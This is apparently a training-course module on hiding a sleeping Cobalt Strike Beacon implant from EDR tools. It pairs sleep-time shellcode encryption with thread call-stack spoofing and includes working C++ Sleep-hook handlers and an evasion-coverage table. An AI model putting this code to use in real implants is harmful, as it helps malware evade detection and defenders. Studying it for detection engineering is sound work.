Module 7: Thread Stack Spoofing Integration
Combining ShellcodeFluctuation with ThreadStackSpoofer for dual-layer evasion — encrypted memory AND clean call stacks.
Module Objective
Understand the call stack detection vector that ShellcodeFluctuation alone does not address, how ThreadStackSpoofer (also by mgeeky) overwrites the return address to terminate stack unwinding, how both techniques integrate through their shared Sleep hook architecture, and the combined evasion profile.
1. The Call Stack Detection Vector
Even with ShellcodeFluctuation encrypting memory and removing the Sleep hook during the idle window, one IOC remains: the thread call stack. When a thread is sleeping, its call stack reveals the chain of function calls that led to the sleep:
// Typical call stack of a sleeping Beacon thread WITHOUT stack spoofing:
//
// ntdll!NtDelayExecution <-- kernel wait
// ntdll!RtlDelayExecution <-- internal delay
// KERNELBASE!SleepEx <-- SleepEx wrapper
// kernel32!Sleep <-- Sleep API
// 0x000001A0004532 <-- MySleep (in loader memory)
// 0x000001A00023A8 <-- Beacon shellcode (SUSPICIOUS!)
// 0x000001A00001C0 <-- Beacon entry point (SUSPICIOUS!)
// ntdll!RtlUserThreadStart <-- thread start
//
// Frames 0x1A00... point to private, non-image memory
// This is a strong IOC: legitimate threads have call stacks
// pointing only to loaded DLLs (image-backed memory)
Why This Matters
Security tools like Process Hacker, Moneta, and EDR products can walk thread call stacks using StackWalk64 or RtlVirtualUnwind. Return addresses pointing to private (non-image) memory are strong indicators of injected code. ShellcodeFluctuation encrypts the memory content, but the return addresses on the stack still point to the shellcode allocation's address range.
2. ThreadStackSpoofer Concept
ThreadStackSpoofer (by mgeeky / Mariusz Banach) addresses the call stack IOC by overwriting the return address that traces back to the shellcode with a null value, effectively terminating the stack walk:
Stack Before vs After Spoofing
Stack shows full chain:
Sleep → MySleep → Beacon
Stack terminates early:
Sleep → MySleep → 0x0
The key mechanism is simple: overwrite the return address of the hook handler frame so that stack unwinding cannot reach the shellcode frames below:
// ThreadStackSpoofer core mechanism
void WINAPI MySleep_WithStackSpoof(DWORD dwMilliseconds) {
// _AddressOfReturnAddress() returns a pointer to the
// return address stored on the stack for THIS function.
// This return address points back into the Beacon shellcode.
auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
// Save the original return address (we need it to get back!)
const auto origReturnAddress = *overwrite;
// Overwrite with 0 - stack unwinding will stop here
*overwrite = 0;
// ... perform Sleep (stack now looks clean) ...
// Restore original return address before returning
*overwrite = origReturnAddress;
}
3. How _AddressOfReturnAddress Works
_AddressOfReturnAddress() is an MSVC compiler intrinsic that returns a pointer to the location on the stack where the return address is stored for the current function. This is the value that RET will pop when the function returns:
// Stack layout when MySleep is called:
//
// Higher addresses (top of stack diagram)
// +--------------------------+
// | Beacon shellcode frame | <-- caller of Sleep
// +--------------------------+
// | Return addr to Beacon | <-- THIS is what _AddressOfReturnAddress points to
// +--------------------------+
// | MySleep local variables |
// +--------------------------+
// | Return addr to MySleep | <-- for functions MySleep calls
// +--------------------------+
// | Sleep/SleepEx frame |
// +--------------------------+
// Lower addresses (bottom of stack)
//
// By overwriting "Return addr to Beacon" with 0:
// Stack walkers see: Sleep -> MySleep -> 0x0 (end)
// They never see the Beacon frames below
Why Not Overwrite More Frames?
Overwriting just the single return address is sufficient because stack unwinding algorithms (RtlVirtualUnwind on x64) stop when they encounter a null return address or a frame that cannot be unwound. Setting one frame to 0 terminates the entire walk. Additional frames below it are invisible to the scanner.
4. Integrating Both Techniques
ShellcodeFluctuation and ThreadStackSpoofer share the same hook point (kernel32!Sleep) and the same author. Combining them is architecturally straightforward — both sets of operations happen in the same MySleep handler:
void WINAPI MySleep_Combined(DWORD dwMilliseconds) {
// ========================================
// STACK SPOOFING: Save and overwrite return address
// ========================================
auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
const auto origReturnAddress = *overwrite;
*overwrite = 0; // Terminate stack walk
// ========================================
// FLUCTUATION: Encrypt shellcode memory
// ========================================
DWORD oldProt;
VirtualProtect(g_state.shellcodeBase, g_state.shellcodeSize,
PAGE_READWRITE, &oldProt);
xor32((BYTE*)g_state.shellcodeBase, g_state.shellcodeSize,
g_state.xorKey);
// ========================================
// UNHOOK: Clean kernel32!Sleep
// ========================================
DWORD hookProt;
VirtualProtect(g_state.sleepFunc, g_state.hookSize,
PAGE_EXECUTE_READWRITE, &hookProt);
memcpy(g_state.sleepFunc, g_state.originalBytes, g_state.hookSize);
VirtualProtect(g_state.sleepFunc, g_state.hookSize,
hookProt, &hookProt);
// ========================================
// SLEEP: Maximum stealth state
// ========================================
// At this point:
// - Shellcode memory: RW + encrypted (invisible)
// - Call stack: terminates at 0 (no shellcode refs)
// - kernel32!Sleep: unhooked (clean)
Sleep(dwMilliseconds);
// ========================================
// REHOOK: Reinstall Sleep interception
// ========================================
VirtualProtect(g_state.sleepFunc, g_state.hookSize,
PAGE_EXECUTE_READWRITE, &hookProt);
memcpy(g_state.sleepFunc, g_state.hookBytes, g_state.hookSize);
VirtualProtect(g_state.sleepFunc, g_state.hookSize,
hookProt, &hookProt);
// ========================================
// FLUCTUATION: Decrypt shellcode memory
// ========================================
xor32((BYTE*)g_state.shellcodeBase, g_state.shellcodeSize,
g_state.xorKey);
VirtualProtect(g_state.shellcodeBase, g_state.shellcodeSize,
PAGE_EXECUTE_READ, &oldProt);
// ========================================
// STACK RESTORE: Put back original return address
// ========================================
*overwrite = origReturnAddress;
// Return to Beacon - execution continues normally
}
5. Dual-Layer Evasion Profile
When both techniques are active during the sleep window, the evasion profile is significantly stronger than either technique alone:
| Detection Vector | Fluctuation Only | Stack Spoof Only | Combined |
|---|---|---|---|
| Private executable memory | Evaded (RW during sleep) | Not addressed | Evaded |
| Shellcode signatures | Evaded (encrypted) | Not addressed | Evaded |
| Beacon config patterns | Evaded (XOR32) | Not addressed | Evaded |
| Call stack to private memory | Not addressed | Evaded (return addr = 0) | Evaded |
| Sleep hook in kernel32 | Evaded (unhook during sleep) | Not addressed | Evaded |
| Thread start address | Not addressed | Not addressed | Not addressed |
| kernel32 private pages (CoW) | Partially addressed | Not relevant | Partially addressed |
Remaining IOCs
Even with both techniques, the thread's start address still points to private memory (the CreateThread target). This is a fundamental IOC that cannot be addressed by post-creation techniques. Solutions include starting the thread on a legitimate DLL function and redirecting via APC, or using thread pool callbacks.
6. Ordering Considerations
The combined approach has specific ordering requirements for the stack spoofing operations:
Operation Order
- Spoof stack FIRST — overwrite the return address before any operations that might be observed. A scanner running between steps sees a clean stack from the earliest possible moment
- Encrypt shellcode — now the memory content is hidden
- Unhook Sleep — remove the last easily-visible IOC
- Sleep — in the maximally hidden state
- Rehook Sleep — prepare for next cycle
- Decrypt shellcode — restore executable content
- Restore stack LAST — the return address must be valid for the
RETinstruction
Restoring the return address must happen last, just before the function returns. If it were restored before decryption, a scanner could briefly see the return address pointing to shellcode memory. If it were never restored, the function would return to address 0 and crash.
7. Advanced Stack Spoofing Considerations
The basic *overwrite = 0 approach has a weakness: a zero return address is itself anomalous. More sophisticated approaches create a fake but plausible call stack:
// Advanced: Spoof with a plausible return address
// Instead of 0, use an address inside a legitimate DLL
void WINAPI MySleep_AdvancedSpoof(DWORD dwMilliseconds) {
auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
const auto origReturnAddress = *overwrite;
// Option 1: Use a known-good return address
// e.g., inside ntdll!RtlUserThreadStart
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
FARPROC threadStart = GetProcAddress(hNtdll, "RtlUserThreadStart");
*overwrite = (ULONG_PTR)threadStart;
// Now the stack looks like:
// Sleep -> MySleep -> RtlUserThreadStart (legitimate!)
// This is a common legitimate call chain.
// ... fluctuation + sleep ...
*overwrite = origReturnAddress;
}
// Option 2: Craft a complete fake frame chain
// This requires understanding x64 unwind metadata and
// creating synthetic RUNTIME_FUNCTION entries, which is
// significantly more complex (see SilentMoonwalk, Unwinder)
Call Stack Validation
Modern EDR solutions are becoming more sophisticated at validating call stacks. They may verify that return addresses correspond to valid CALL instruction targets, check unwind metadata consistency, or compare stacks against known-good patterns. Simple spoofing (setting return to 0 or a random DLL address) may be detected by these advanced techniques. Full call stack fabrication (as in SilentMoonwalk) is significantly more complex but more robust.
8. Implementation Notes and Caveats
Practical Considerations
| Topic | Details |
|---|---|
| Compiler optimization | _AddressOfReturnAddress() requires that the function has a standard stack frame. Aggressive inlining or frame pointer omission can break it. Compile with /Oy- (do not omit frame pointers) or use #pragma optimize("", off) |
| x64 unwind info | x64 Windows uses table-based exception handling. The stack spoof works because stack walkers rely on return addresses for unwinding. Setting a return address to 0 causes the unwind to terminate gracefully |
| Debug builds | Debug builds add stack cookies and additional frame metadata. Stack spoofing works in both Debug and Release builds, but the stack layout differs |
| Thread count | Both techniques operate per-thread. If the implant spawns worker threads, each thread that calls Sleep will trigger its own fluctuation+spoof cycle |
| Non-Sleep waits | If the implant uses WaitForSingleObject or WaitForMultipleObjects instead of Sleep, those functions would also need to be hooked for complete coverage |
Same Author, Same Architecture
A key advantage of combining ShellcodeFluctuation and ThreadStackSpoofer is that both tools were designed by the same author (mgeeky) with integration in mind. They share the same hooking architecture (inline hook on kernel32!Sleep), the same loader pattern (VirtualAlloc + memcpy + CreateThread), and compatible state management. Merging them into a single MySleep handler is a natural architectural fit.
Knowledge Check
Q1: What detection vector does ThreadStackSpoofer address that ShellcodeFluctuation does not?
Q2: How does ThreadStackSpoofer terminate the stack walk?
Q3: Why must the original return address be restored LAST, just before MySleep returns?